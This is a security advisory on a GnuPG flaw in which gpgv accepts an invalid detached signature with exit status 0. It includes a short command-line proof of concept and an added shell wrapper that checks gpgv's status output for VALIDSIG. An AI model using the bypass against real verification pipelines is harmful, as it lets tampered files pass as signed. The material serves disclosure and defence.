GnuPG Detached Signature Verification Bypass Vulnerability
An exploit is not required. An example demonstrating this issue was provided:

    fortune >x.txt
    perl -e 'print "\xca"x"64"' >x.txt.sig
    gpgv x.txt.sig x.txt
    echo $?

This creates a file as well as an obviously invalid detached signature file. The file is then successfully validated by 'gpgv', since the exit status is '0'.
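One way for a calling script to avoid depending on the exit status alone, shown as an added example that is not part of the advisory or of GnuPG: require a VALIDSIG line in the output of gpgv's --status-fd option before accepting a file. The function names, the keyring argument and the sample status lines below are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: accept a detached signature only on positive evidence from
# gpgv's status output, never on exit status 0 alone.

# Reads "gpgv --status-fd" lines on stdin. Succeeds only if a VALIDSIG line
# is present and no line reports a bad, unverifiable or missing signature.
status_is_valid() {
    awk '
        $1 != "[GNUPG:]" { next }
        $2 == "VALIDSIG" { good++ }
        $2 == "BADSIG"   { bad++ }
        $2 == "ERRSIG"   { bad++ }
        $2 == "NODATA"   { bad++ }
        END { exit !(good > 0 && bad == 0) }
    '
}

# Hypothetical wrapper: verify_detached SIGFILE DATAFILE KEYRING
verify_detached() {
    # Status lines go to fd 1; human-readable messages (stderr) are dropped.
    status=$(gpgv --keyring "$3" --status-fd 1 "$1" "$2" 2>/dev/null) || return 1
    printf '%s\n' "$status" | status_is_valid
}

# Constructed sample status output; key ID, fingerprint and name are
# placeholders. The advisory does not show what gpgv prints for x.txt.sig.
SAMPLE_GOOD='[GNUPG:] GOODSIG 0123456789ABCDEF Example Signer <signer@example.org>
[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2006-02-15 1140000000'
SAMPLE_NODATA='[GNUPG:] NODATA 3'
# Exit status 0 with no status lines at all: the case the advisory describes.
SAMPLE_EMPTY=''
SAMPLE_MIXED='[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2006-02-15 1140000000
[GNUPG:] BADSIG 0123456789ABCDEF Example Signer <signer@example.org>'
```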